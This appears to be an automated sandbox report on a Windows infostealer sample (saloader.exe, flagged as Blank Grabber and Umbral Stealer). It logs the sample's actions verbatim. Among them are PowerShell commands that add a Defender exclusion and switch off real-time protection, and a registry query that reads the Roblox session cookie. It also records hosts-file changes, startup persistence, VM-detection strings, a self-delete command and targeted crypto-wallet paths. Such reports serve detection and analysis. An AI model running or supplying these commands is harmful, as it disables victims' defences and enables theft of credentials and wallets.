                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99108Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98886Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98778Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98667Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98559Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 98452Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598234Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598124Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598015Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597906Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597796Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597249Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597128Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: saloader.exe, FRc7Z.scr.0.drBinary or memory string: vboxtray
                        Source: FRc7Z.scr.0.drBinary or memory string: vboxservice
                        Source: saloader.exe, FRc7Z.scr.0.drBinary or memory string: qemu-ga
                        Source: FRc7Z.scr.0.drBinary or memory string: vmwareuser
                        Source: saloader.exe, FRc7Z.scr.0.drBinary or memory string: vmusrvc
                        Source: FRc7Z.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
                        Source: FRc7Z.scr.0.drBinary or memory string: vmsrvc
                        Source: FRc7Z.scr.0.drBinary or memory string: vmtoolsd
                        Source: FRc7Z.scr.0.drBinary or memory string: vmwaretray
                        Source: saloader.exe, 00000000.00000002.1918588058.000002113D8E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\saloader.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\saloader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\saloader.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\saloader.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\saloader.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\saloader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Users\user\Desktop\saloader.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\saloader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: saloader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: saloader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
